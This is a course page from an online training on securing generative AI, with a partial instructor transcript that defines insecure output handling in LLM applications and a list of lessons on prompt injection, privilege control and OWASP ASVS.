From the course: Securing Generative AI: Strategies, Methodologies, Tools, and Best Practices
Unlock this course with a free trial
Join today to access over 24,800 courses taught by industry experts.
Understanding insecure output handling attacks
From the course: Securing Generative AI: Strategies, Methodologies, Tools, and Best Practices
Understanding insecure output handling attacks
- [Instructor] Insecure output handling occurs whenever there's inadequate validation and sanitation, and also the processing of outputs that are generated by the AI application or large language models. And these are failures of validation before their pass on the systems or components that they're interacting since the outputs or the inference can be influenced by user prompts. And, of course, giving users indirect access to additional systems and functionalities is one of the issues that we have in here. So unlike over-reliance, which focuses on the broader risk of depending too much on the accuracy and the reliability of the LLM outputs, in this case, this vulnerability, insecure output handling, is specifically concerned with the handling of those outputs before they're moving downstream to other systems. Whether it's to a web browser or to a system shell and so on. Exploiting an insecure output handling vulnerability could lead into security issues like cross-site scripting or…
Contents
-
-
-
-
(Locked)
Learning objectives1m 1s
-
Defining prompt injection attacks11m 41s
-
(Locked)
Exploring real-life prompt injection attacks3m 57s
-
(Locked)
Using ChatML for OpenAI API calls to indicate to the LLM the source of prompt input10m 4s
-
(Locked)
Enforcing privilege control on LLM access to back-end systems6m 10s
-
(Locked)
Best practices around API tokens for plugins, data access, and function-level permissions3m 2s
-
(Locked)
Understanding insecure output handling attacks3m 22s
-
(Locked)
Using the OWASP ASVS to protect against insecure output handling4m 43s
-
(Locked)
-
-
-
-
-